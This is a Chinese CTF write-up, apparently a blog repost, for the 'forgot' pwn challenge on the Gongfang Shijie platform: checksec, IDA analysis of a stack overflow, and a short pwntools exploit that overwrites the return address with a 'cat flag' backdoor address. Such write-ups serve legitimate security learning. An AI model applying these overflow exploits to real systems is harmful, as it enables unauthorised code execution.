攻防世界 Pwn forgot
2021/12/18 23:27:30
本文主要是介绍攻防世界 Pwn forgot,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
攻防世界 Pwn forgot
- 1.题目下载地址
- 2.checksec
- 3.IDA
- 4.exp
1.题目下载地址
点击下载
2.checksec
没有canary,可以随便溢出
没有PIE。可以随便使用后门函数
3.IDA
可以看到有两个溢出点
第一处限制了输入大小,我们就不管了
第二处是一个简单的溢出
只要知道需要覆盖多少byte数据就可以
接下来找到了cat flag的后门
也就是说只要把后门函数的地址直接跟在溢出数据之后就可以控制程序了
4.exp
from pwn import * io = remote('111.200.241.244',56240) # io = process("./forgot") flag_addr = 0x080486CC io.recv() io.sendline("kk") io.recv() payload = "a" * 32 + "a" * 4 + p32(flag_addr) io.sendline(payload) io.interactive()
得到flag
这篇关于攻防世界 Pwn forgot的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-26解决google chrome helper 内存占用较高!
- 2024-04-01got an unexpected keyword argument
- 2024-03-30维多利亚的秘密 golang入坑系统
- 2024-03-29mongodb sort by date
- 2024-03-29go swagger
- 2024-03-25mongodb cdc
- 2024-03-25how to use go in vscode
- 2024-03-22mongooseserverselectionerror: connect econnrefused ::1:27017
- 2024-03-21pymongo insert_many
- 2024-03-18projection mongodb